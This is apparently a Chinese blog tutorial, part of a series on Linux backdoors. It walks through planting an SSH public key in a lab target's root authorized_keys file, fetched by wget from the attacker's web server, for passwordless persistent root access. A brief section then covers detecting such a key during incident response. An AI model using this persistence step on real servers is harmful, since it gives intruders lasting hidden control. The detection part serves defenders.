LINUX留后门--教程(四)—— ssh 公钥免密

485 阅读3分钟

一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、SSH后门-教程一

前提条件:  假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限,但不知道root密码
环境:  靶机(centos8):192.168.160.131
攻击机(win10):192.168.160.1

2.1 使用 Xshell 生成公钥与私钥

在攻击机上使用 Xshell 生成私钥,按照如图所示选择“新建用户密钥生成向导”

image.png

默认点击下一步

image.png

image.png

之后输入 密钥名称与密码(可任意设置),此处密码设为:wxiaoge123 ,之后点击下一步

image.png

之后点击“保存为文件”

image.png 保存文件到 下载目录(保存的文件为公钥)

image.png 成功保存文件之后,再点击完成

image.png 弹窗提示如下所示,即正确生成,此处密钥为私钥

2.2 将公钥上传到靶机centos

第一步:  在本机搭建WEB环境,将公钥 id_rsa_2048.pub 防止WWW目录下,让靶机可以下载改公钥,也就是将公钥通过wget的方式传到靶机上

image.png 第二步:  在已拿到root权限的靶机上通过wget方式下载 xhell的公钥 id_rsa_2048.pub

http://192.168.160.1/id_rsa_2048.pub

image.png 第三步:  将公钥 id_rsa_2048.pub 内容写进 .ssh/authorized_keys 文件中

查找 authorized_keys 文件的位置,发现该服务器中无该文件

find -name authorized_keys

image.png 那么我们就开启免密登录功能
命令:

ssh-keygen -t rsa

image.png 可以在ssh目录下创建该文件
命令:

touch /root/.ssh/authorized_keys

image.png 接下来将xhell的公钥追加到 authorized_keys 文件,并且给 authorized_keys 文件赋予执行权限

cat id_rsa_2048.pub >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

image.png

2.3 Xshell 免密登录测试

点击新建会话,输入主机IP地址

image.png 输入完之后,不要点击确定,接下来点击 “用户身份验证”,并选择 Public Key

image.png 之后输按照如图所示输入用户名密码(本例是root/wxiaoge123),输完用户名密码之后点击“确定”

image.png

选择会话之后点击连接

image.png 不需要输入用户名密码就可以成功登录

image.png

三、 ssh 公钥免密——应急响应发现

第一步:  查看服务器开放的端口号,发现有个ssh连接,并且与负责人确定改IP正常情况下不能登录服务器

image.png 根据PID号查看进程,并未发现异常,是正常的ssh登录

image.png 那么接下来查看 authorized_keys 文件是否被篡改

cat /root/.ssh/authorized_keys

发现已被添加未知用户的公钥

image.png 查看被篡改时间,确定是最近被篡改的

ls -l /root/.ssh/authorized_keys

image.png

更多资源:\

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程\

收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥\

image.png